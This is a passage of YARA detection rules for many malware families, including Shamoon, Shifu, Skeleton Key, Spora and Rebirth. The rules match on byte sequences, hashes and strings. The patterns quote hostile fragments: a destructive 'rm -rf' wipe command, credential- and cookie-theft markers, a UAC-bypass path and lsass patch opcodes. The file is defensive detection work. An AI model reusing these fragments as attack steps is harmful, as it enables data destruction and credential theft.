(http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule MALW_PurpleWave_v1 { meta: Description ="Generic rule to identify PurpleWave v1.0" Author = "Xylitol <xylitol@temari.fr>" date = "2020-08-01" reference = "https://twitter.com/3xp0rtblog/status/1289125217751781376" hash1 = "7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df" hash2 = "76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304" hash3 = "832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd" hash4 = "917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9" hash5 = "a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16" hash6 = "d5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161" hash7 = "d820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9" hash8 = "d4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554" hash9 = "4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d" strings: $MZ = {4D 5A} $decoderoutine = { 8B 45 E8 33 C9 8A 04 07 28 04 1A 42 83 FF 07 8D 47 01 0F 45 C8 8B F9 3B D6 7C E5 } /* generic routine used to decode strings (bot name, bot version, mutex, c2 url, etc..) /8B45 E8 /MOV EAX,[LOCAL.6] |33C9 |XOR ECX,ECX |8A0407 |MOV AL,BYTE PTR DS:[EDI+EAX] |28041A |SUB BYTE PTR DS:[EDX+EBX],AL |42 |INC EDX |83FF 07 |CMP EDI,7 |8D47 01 |LEA EAX,DWORD PTR DS:[EDI+1] |0F45C8 |CMOVNE ECX,EAX |8BF9 |MOV EDI,ECX |3BD6 |CMP EDX,ESI \7C E5 \JL SHORT 76bffcf0.0135B57F */ // Regular strings that can be found into purplewave 1.0 samples $string1 = " at t.me/LuckyStoreSupport |" fullword wide $string2 = "][aes_key]" wide ascii $string3 = "][passwords][" wide ascii $string4 = "][is_encrypted]" wide ascii $string5 = "][cards][" wide ascii $string6 = "][number]" wide ascii $string7 = "][domain]" wide ascii $string8 = "][cookies][" wide ascii $string9 = "][flag]" wide ascii $string10 = "][histories][" wide ascii $string11 = "D877F783D5D3EF8C" wide ascii $alphabet1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" $alphabet2 = "0123456789abcdefghijklmnopqrstuvwxyz" condition: ($MZ at 0 and $decoderoutine) and ( (5 of ($string*) and all of ($alphabet*)) ) and filesize < 700KB // Standard size when not packed should be arround ~598/600kb } rule MALW_FakePyPI { meta: description = "Identifies fake PyPI Packages." author = "@bartblaze" reference = "http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/" date = "2017-09" tlp = "white" strings: $ = "# Welcome Here! :)" $ = "# just toy, no harm :)" $ = "[0x76,0x21,0xfe,0xcc,0xee]" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule PE_File_pyinstaller { meta: author = "Didier Stevens (https://DidierStevens.com)" description = "Detect PE file produced by pyinstaller" reference = "https://isc.sans.edu/diary/21057" strings: $a = "pyi-windows-manifest-filename" condition: pe.number_of_resources > 0 and $a } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule MachO_File_pyinstaller { meta: author = "KatsuragiCSL (https://katsuragicsl.github.io)" description = "Detect Mach-O file produced by pyinstaller" strings: $a = "pyi-runtime-tmpdir" $b = "pyi-bootloader-ignore-signals" condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule QuarianStrings : Quarian Family { meta: description = "Quarian Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-09" strings: $ = "s061779s061750" $ = "[OnUpLoadFile]" $ = "[OnDownLoadFile]" $ = "[FileTransfer]" $ = "---- Not connect the Manager, so start UnInstall ----" $ = "------- Enter CompressDownLoadDir ---------" $ = "------- Enter DownLoadDirectory ---------" $ = "[HandleAdditionalData]" $ = "[mswsocket.dll]" $ = "msupdate.dll........Enter ThreadCmd!" $ = "ok1-1" $ = "msupdate_tmp.dll" $ = "replace Rpcss.dll successfully!" $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb" $ = "\\drivercashe\\" wide ascii $ = "\\microsoft\\windwos\\" wide ascii $ = "\\DosDevices\\LOADHIDDENDRIVER" wide ascii $ = "\\Device\\LOADHIDDENDRIVER" wide ascii $ = "Global\\state_maping" wide ascii $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb" $ = "Global\\unInstall_event_1554_Ower" wide ascii condition: any of them } rule QuarianCode : Quarian Family { meta: description = "Quarian code features" author = "Seth Hardy" last_modified = "2014-07-09" strings: // decrypt in intelnat.sys $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? } // decrypt in mswsocket.dll $ = { C1 EF 05 C1 E3 04 33 FB } $ = { 33 D8 81 EE 47 86 C8 61 } // loop in msupdate.dll $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF } condition: any of them } rule Quarian : Family { meta: description = "Quarian" author = "Seth Hardy" last_modified = "2014-07-09" condition: QuarianCode or QuarianStrings } /* Yara rule to detect ELF Linux malware Rebirth Vulcan (Torlus next-gen) generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ private rule is__str_Rebirth_gen3 { meta: description = "Generic detection for Vulcan branch Rebirth or Katrina from Torlus nextgen" reference = "https://imgur.com/a/SSKmu" reference = "https://www.reddit.com/r/LinuxMalware/comments/7rprnx/vulcan_aka_linuxrebirth_or_katrina_variant_of/" author = "unixfreaxjp" org = "MalwareMustDie" date = "2018-01-21" strings: $str01 = "/usr/bin/python" fullword nocase wide ascii $str02 = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" fullword nocase wide ascii $str03 = "Telnet Range %d->%d" fullword nocase wide ascii $str04 = "Mirai Range %d->%d" fullword nocase wide ascii $str05 = "[Updating] [%s:%s]" fullword nocase wide ascii $str06 = "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*" fullword nocase wide ascii $str07 = "\x1B[96m[DEVICE] \x1B[97mConnected" fullword nocase wide ascii condition: 4 of them } private rule is__hex_Rebirth_gen3 { meta: author = "unixfreaxjp" date = "2018-01-21" strings: $hex01 = { 0D C0 A0 E1 00 D8 2D E9 } $hex02 = { 3C 1C 00 06 27 9C 97 98 } $hex03 = { 94 21 EF 80 7C 08 02 A6 } $hex04 = { E6 2F 22 4F 76 91 18 3F } $hex05 = { 06 00 1C 3C 20 98 9C 27 } $hex06 = { 55 89 E5 81 EC ?? 10 00 } $hex07 = { 55 48 89 E5 48 81 EC 90 } $hex08 = { 6F 67 69 6E 00 } condition: 2 of them } private rule is__bot_Rebirth_gen3 { meta: author = "unixfreaxjp" date = "2018-01-21" strings: $bot01 = "MIRAITEST" fullword nocase wide ascii $bot02 = "TELNETTEST" fullword nocase wide ascii $bot03 = "UPDATE" fullword nocase wide ascii $bot04 = "PHONE" fullword nocase wide ascii $bot05 = "RANGE" fullword nocase wide ascii $bot06 = "KILLATTK" fullword nocase wide ascii $bot07 = "STD" fullword nocase wide ascii $bot08 = "BCM" fullword nocase wide ascii $bot09 = "NETIS" fullword nocase wide ascii $bot10 = "FASTLOAD" fullword nocase wide ascii condition: 6 of them } rule MALW_Rebirth_Vulcan_ELF { meta: description = "Detects Rebirth Vulcan variant a torlus NextGen MALW" description = "Just adjust or omit below two strings for next version they code :) @unixfreaxjp" date = "2018-01-21" strings: $spec01 = "vulcan.sh" fullword nocase wide ascii $spec02 = "Vulcan" fullword nocase wide ascii condition: all of them and is__elf and is__str_Rebirth_gen3 and is__hex_Rebirth_gen3 and is__bot_Rebirth_gen3 and filesize < 300KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule RegSubDatCode : RegSubDat Family { meta: description = "RegSubDat code features" author = "Seth Hardy" last_modified = "2014-07-14" strings: // decryption loop $ = { 80 34 3? 99 40 (3D FB 65 00 00 | 3B C6) 7? F? } // push then pop values $ = { 68 FF FF 7F 00 5? } $ = { 68 FF 7F 00 00 5? } condition: all of them } rule RegSubDatStrings : RegSubDat Family { meta: description = "RegSubDat Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-14" strings: $avg1 = "Button" $avg2 = "Allow" $avg3 = "Identity Protection" $avg4 = "Allow for all" $avg5 = "AVG Firewall Asks For Confirmation" $mutex = "0x1A7B4C9F" condition: all of ($avg*) or $mutex } rule RegSubDat : Family { meta: description = "RegSubDat" author = "Seth Hardy" last_modified = "2014-07-14" condition: RegSubDatCode or RegSubDatStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Description: Rar file with a .js inside Author: iHeartMalware Priority: 5 Scope: Against Attachment Tags: http://phishme.com/rockloader-new-upatre-like-downloader-pushed-dridex-downloads-malwares/ Created in PhishMe Triage on April 7, 2016 3:41 PM */ rule rar_with_js { strings: $h1 = "Rar!" $s1 = ".js" nocase condition: $h1 at 0 and $s1 } rule RockLoader{ meta: name = "RockLoader" description = "RockLoader Malware" author = "@seanmw" strings: $hdr = {4d 5a 90 00} $op1 = {39 45 f0 0f 8e b0 00 00 00} $op2 = {32 03 77 73 70 72 69 6e 74 66 41 00 ce 02 53 65} condition: $hdr at 0 and all of ($op*) and filesize < 500KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule RooterCode : Rooter Family { meta: description = "Rooter code features" author = "Seth Hardy" last_modified = "2014-07-10" strings: // xor 0x30 decryption $ = { 80 B0 ?? ?? ?? ?? 30 40 3D 00 50 00 00 7C F1 } condition: any of them } rule RooterStrings : Rooter Family { meta: description = "Rooter Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-10" strings: $group1 = "seed\x00" $group2 = "prot\x00" $group3 = "ownin\x00" $group4 = "feed0\x00" $group5 = "nown\x00" condition: 3 of ($group*) } rule Rooter : Family { meta: description = "Rooter" author = "Seth Hardy" last_modified = "2014-07-10" condition: RooterCode or RooterStrings } rule RookieStrings : Rookie Family { meta: description = "Rookie Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-25" strings: $ = "RookIE/1.0" condition: any of them } rule RookieCode : Rookie Family { meta: description = "Rookie code features" author = "Seth Hardy" last_modified = "2014-06-25" strings: // hidden AutoConfigURL $ = { C6 ?? ?? ?? 41 C6 ?? ?? ?? 75 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 43 C6 ?? ?? ?? 6F C6 ?? ?? ?? 6E C6 ?? ?? ?? 66 } // hidden ProxyEnable $ = { C6 ?? ?? ?? 50 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 78 C6 ?? ?? ?? 79 C6 ?? ?? ?? 45 C6 ?? ?? ?? 6E C6 ?? ?? ?? 61 } // xor on rand value? $ = { 8B 1D 10 A1 40 00 [18] FF D3 8A 16 32 D0 88 16 } condition: any of them } rule Rookie : Family { meta: description = "Rookie" author = "Seth Hardy" last_modified = "2014-06-25" condition: RookieCode or RookieStrings } rule rovnix_downloader : downloader { meta: author="Intel Security" description="Rovnix downloader with sinkhole checks" reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/" strings: $sink1= "control" $sink2 = "sink" $sink3 = "hole" $sink4= "dynadot" $sink5= "block" $sink6= "malw" $sink7= "anti" $sink8= "googl" $sink9= "hack" $sink10= "trojan" $sink11= "abuse" $sink12= "virus" $sink13= "black" $sink14= "spam" $boot= "BOOTKIT_DLL.dll" $mz = { 4D 5A } condition: $mz in (0..2) and all of ($sink*) and $boot } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule SafeNetCode : SafeNet Family { meta: description = "SafeNet code features" author = "Seth Hardy" last_modified = "2014-07-16" strings: // add edi, 14h; cmp edi, 50D0F8h $ = { 83 C7 14 81 FF F8 D0 40 00 } condition: any of them } rule SafeNetStrings : SafeNet Family { meta: description = "Strings used by SafeNet" author = "Seth Hardy" last_modified = "2014-07-16" strings: $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr" $ = "/safe/record.php" $ = "_Rm.bat" wide ascii $ = "try\x0d\x0a\x09\x09\x09\x09 del %s" wide ascii $ = "Ext.org" wide ascii condition: any of them } rule SafeNet : Family { meta: description = "SafeNet family" condition: SafeNetCode or SafeNetStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Sakurel_backdoor { meta: maltype = "Sakurel backdoor" ref = "https://github.com/reed1713" reference = "http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Sakurel.A#tab=2" description = "malware creates a process in the temp directory and performs the sysprep UAC bypass method." strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="Windows\\System32\\sysprep\\sysprep.exe" nocase $type1="Microsoft-Windows-Security-Auditing" $eventid1="4688" $data1="AppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe" nocase condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Vinsula_Sayad_Binder : infostealer binder { meta: Author = "Vinsula, Inc" Date = "2014/06/20" Description = "Sayad Infostealer Binder" Reference = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/" strings: $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Binder\\obj\\Debug\\Binder.pdb" $delphinativestr = "DelphiNative.dll" nocase $sqlite3str = "sqlite3.dll" nocase $winexecstr = "WinExec" $sayadconfig = "base.dll" wide condition: all of them } rule Vinsula_Sayad_Client : infostealer { meta: Author = "Vinsula, Inc" Date = "2014/06/20" Description = "Sayad Infostealer Client" Reference = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/" strings: $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb" $sayadconfig = "base.dll" wide $sqlite3str = "sqlite3.dll" nocase $debugstr01 = "Config loaded" wide $debugstr02 = "Config parsed" wide $debugstr03 = "storage uploader" wide $debugstr04 = "updater" wide $debugstr05 = "keylogger" wide $debugstr06 = "Screenshot" wide $debugstr07 = "sqlite found & start collectiong data" wide $debugstr08 = "Machine info collected" wide $debugstr09 = "browser ok" wide $debugstr10 = "messenger ok" wide $debugstr11 = "vpn ok" wide $debugstr12 = "ftp client ok" wide $debugstr13 = "ftp server ok" wide $debugstr14 = "rdp ok" wide $debugstr15 = "kerio ok" wide $debugstr16 = "skype ok" wide $debugstr17 = "serialize data ok" wide $debugstr18 = "Keylogged" wide condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule ScarhiknStrings : Scarhikn Family { meta: description = "Scarhikn Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-25" strings: $ = "9887___skej3sd" $ = "haha123" condition: any of them } rule ScarhiknCode : Scarhikn Family { meta: description = "Scarhikn code features" author = "Seth Hardy" last_modified = "2014-06-25" strings: // decryption $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 } $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 } condition: any of them } rule Scarhikn : Family { meta: description = "Scarhikn" author = "Seth Hardy" last_modified = "2014-06-25" condition: ScarhiknCode or ScarhiknStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule sendsafe { meta: author = " J from THL <j@techhelplist.com>" date = "2016/09" reference = "http://pastebin.com/WPWWs406" version = 2 maltype = "Spammer" filetype = "memory" strings: $a = "Enterprise Mailing Service" $b = "Blacklisted by rule: %s:%s" $c = "/SuccessMails?CampaignNum=%ld" $d = "/TimedOutMails?CampaignNum=%ld" $e = "/InvalidMails?CampaignNum=%ld" $f = "Failed to download maillist, retrying" $g = "No maillist loaded" $h = "Successfully sent using SMTP account %s (%d of %ld messages to %s)" $i = "Successfully sent %d of %ld messages to %s" $j = "Sending to %s in the same connection" $k = "New connection required, will send to %s" $l = "Mail transaction for %s is over." $m = "Domain %s is bad (found in cache)" $n = "Domain %s found in cache" $o = "Domain %s isn't found in cache, resolving it" $p = "All tries to resolve %s failed." $q = "Failed to receive response for %s from DNS server" $r = "Got DNS server response: domain %s is bad" $s = "Got error %d in response for %s from DNS server" $t = "MX's IP for domain %s found in cache:" $u = "Timeout waiting for domain %s to be resolved" $v = "No valid MXes for domain %s. Marking it as bad" $w = "Resolving MX %s using existing connection to DNS server" $x = "All tries to resolve MX for %s are failed" $y = "Resolving MX %s using DNS server" $z = "Failed to receive response for MX %s from DNS server" condition: 13 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule CrowdStrike_Shamoon_DroppedFile { meta: description = "Rule to detect Shamoon malware http://goo.gl/QTxohN" reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf" strings: $testn123 = "test123" wide $testn456 = "test456" wide $testn789 = "test789" wide $testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide condition: (any of ($testn*) or $pingcmd) and $testdomain } rule Shamoon2_Wiper { meta: description = "Detects Shamoon 2.0 Wiper Component" author = "Florian Roth" reference = "https://goo.gl/jKIfGB" date = "2016-12-01" score = 70 hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a" hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd" strings: $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide $s1 = "UFWYNYNTS" fullword wide $s2 = "\\\\?\\ElRawDisk" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them ) } rule Shamoon2_ComComp { meta: description = "Detects Shamoon 2.0 Communication Components" author = "Florian Roth (with Binar.ly)" reference = "https://goo.gl/jKIfGB" date = "2016-12-01" score = 70 hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842" strings: $s1 = "mkdir %s%s > nul 2>&1" fullword ascii $s2 = "p[%s%s%d.%s" fullword ascii $op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 } $op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d } $op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c } condition: uint16(0) == 0x5a4d and filesize < 500KB and ( all of ($s*) or all of ($op*) ) } rule EldoS_RawDisk { meta: description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)" author = "Florian Roth (with Binar.ly)" reference = "https://goo.gl/jKIfGB" date = "2016-12-01" score = 50 hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34" hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b" strings: $s1 = "g\\system32\\" fullword wide $s2 = "ztvttw" fullword wide $s3 = "lwizvm" fullword ascii $s4 = "FEJIKC" fullword ascii $s5 = "INZQND" fullword ascii $s6 = "IUTLOM" fullword wide $s7 = "DKFKCK" fullword ascii $op1 = { 94 35 77 73 03 40 eb e9 } $op2 = { 80 7c 41 01 00 74 0a 3d } $op3 = { 74 0a 3d 00 94 35 77 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them ) } rule Shamoon_Disttrack_Dropper { meta: description = "Detects Shamoon 2.0 Disttrack Dropper" author = "Florian Roth" reference = "https://goo.gl/jKIfGB" date = "2016-12-01" score = 70 hash1 = "4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6" hash2 = "5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a" strings: $a1 = "\\#{9A6DB7D2-FECF-41ff-9A92-6EDA696613DF}#" wide $a2 = "\\#{8A6DB7D2-FECF-41ff-9A92-6EDA696613DE}#" wide $s1 = "\\amd64\\elrawdsk.pdb" fullword ascii $s2 = "RawDiskSample.exe" fullword wide $s3 = "RawDisk Driver. Allows write access to files and raw disk sectors for user mode applications in Windows 2000 and later." fullword wide $s4 = "elrawdsk.sys" fullword wide $s5 = "\\DosDevices\\ElRawDisk" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 90KB and 1 of ($a*) and 1 of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Shifu_Banking_Trojan_0 : banking { meta: description = "Detects Shifu Banking Trojan" author = "Florian Roth" reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/" date = "2015-09-01" hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2" hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737" strings: $x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" fullword ascii $s1 = "listen above" fullword wide $s2 = "familycould cost" fullword wide $s3 = "SetSystemTimeAdjustment" fullword ascii /* Goodware String - occured 33 times */ $s4 = "PeekNamedPipe" fullword ascii /* Goodware String - occured 347 times */ condition: uint16(0) == 0x5a4d and filesize < 1000KB and ($x1 or all of ($s*)) } rule SHIFU_Banking_Trojan_1 : banking { meta: description = "Detects SHIFU Banking Trojan" author = "Florian Roth" reference = "http://goo.gl/52n8WE" date = "2015-10-31" score = 70 hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0" hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5" hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d" hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485" hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f" hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b" hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4" hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290" hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8" hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05" hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123" hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9" hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503" hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d" strings: $x1 = "\\Gather\\Dividerail.pdb" ascii $s0 = "\\payload\\payload.x86.pdb" ascii $s1 = "USER_PRIV_GUEST" fullword wide $s2 = "USER_PRIV_ADMIN" fullword wide $s3 = "USER_PRIV_USER" fullword wide $s4 = "PPSWVPP" fullword ascii $s5 = "WinSCard.dll" fullword ascii /* Goodware String - occured 83 times */ condition: uint16(0) == 0x5a4d and ($x1 or 5 of ($s*)) } rule Shifu : banking { meta: reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/" author = "McAfee Labs" strings: $b = "RegCreateKeyA" $a = "CryptCreateHash" $c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E} $d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65} $e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45} condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule skeleton_key_patcher { meta: description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN" author = "Dell SecureWorks Counter Threat Unit" reference = "http://goo.gl/aAk3lN" date = "2015/01/13" score = 70 strings: $target_process = "lsass.exe" wide $dll1 = "cryptdll.dll" $dll2 = "samsrv.dll" $name = "HookDC.dll" $patched1 = "CDLocateCSystem" $patched2 = "SamIRetrievePrimaryCredentials" $patched3 = "SamIRetrieveMultiplePrimaryCredentials" condition: all of them } rule skeleton_key_injected_code { meta: description = "Skeleton Key injected Code http://goo.gl/aAk3lN" author = "Dell SecureWorks Counter Threat Unit" reference = "http://goo.gl/aAk3lN" date = "2015/01/13" score = 70 strings: $injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 } $patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 } $patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 } $patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 } condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Spora { meta: author = "pekeinfo" date = "2017-02-22" description = "Spora" strings: $a={7B 7F 4E 11 5D F3 FE 15 F9 55 FD 00 AD E9 CF FE E2 56 78 03 D0 21 46 00 30 68 C4 D0 01 FD 00 C3 B7 00 4A 0D 57 D2 52 91 05} $b={6F 51 3E 6B F9 15 29 D9 DF 26 1E 80 62 8A 0D E3 64 51 3B 0F F3 FE FF FF F3 FE FF FF F3 FE FF FF F3 FE FF FF} condition: $a and $b } rule unk_packer { meta: author = "pekeinfo" date = "2017-02-22" description = "Spora & Cerber ek" strings: $a = {0E 9E 52 69 C8 E4 73 BF 87 2B 95 15 33 1B B7 6B 46 62 D8 C1 01 A9 F9 17 FC EF 1A 6E B7 36 3C C4 72 7D 5D 1A 2D C4 7E 70 E8 0A A0 C6 A3 51 C1 1C 5E 98 E2 72 19 DF 03 C9 D4 25 25 1F EF 6B 46 75 9C BB 1D D2 57 56 35 75 31 35 56 8F B7 5B 23 3D } $b ={00 10 00 2E E8 77 EC FF FF 85 C0 0F 85 78 C4 FF} condition: $a and $b } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule with_sqlite : sqlite { meta: author = "Julian J. Gonzalez <info@seguridadparatodos.es>" reference = "http://www.st2labs.com" description = "Rule to detect the presence of SQLite data in raw image" strings: $hex_string = {53 51 4c 69 